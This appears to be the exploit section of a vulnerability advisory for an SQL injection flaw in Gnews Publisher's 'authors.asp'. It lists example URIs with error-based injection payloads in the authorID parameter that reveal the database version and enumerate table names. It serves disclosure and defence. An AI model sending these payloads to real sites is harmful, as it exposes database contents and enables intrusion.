Gnews Publisher 'authors.asp' SQL Injection Vulnerability

info
discussion
exploit
solution
references

Gnews Publisher 'authors.asp' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/gnews/authors.asp?authorID=(SQL)
http://www.example.com/gnews/authors.asp?authorID=convert(int,(select+@@version));-- http://www.example.com/gnews/authors.asp?authorID=convert(int,(select+top+1+table_name+from+information_schema.tables));--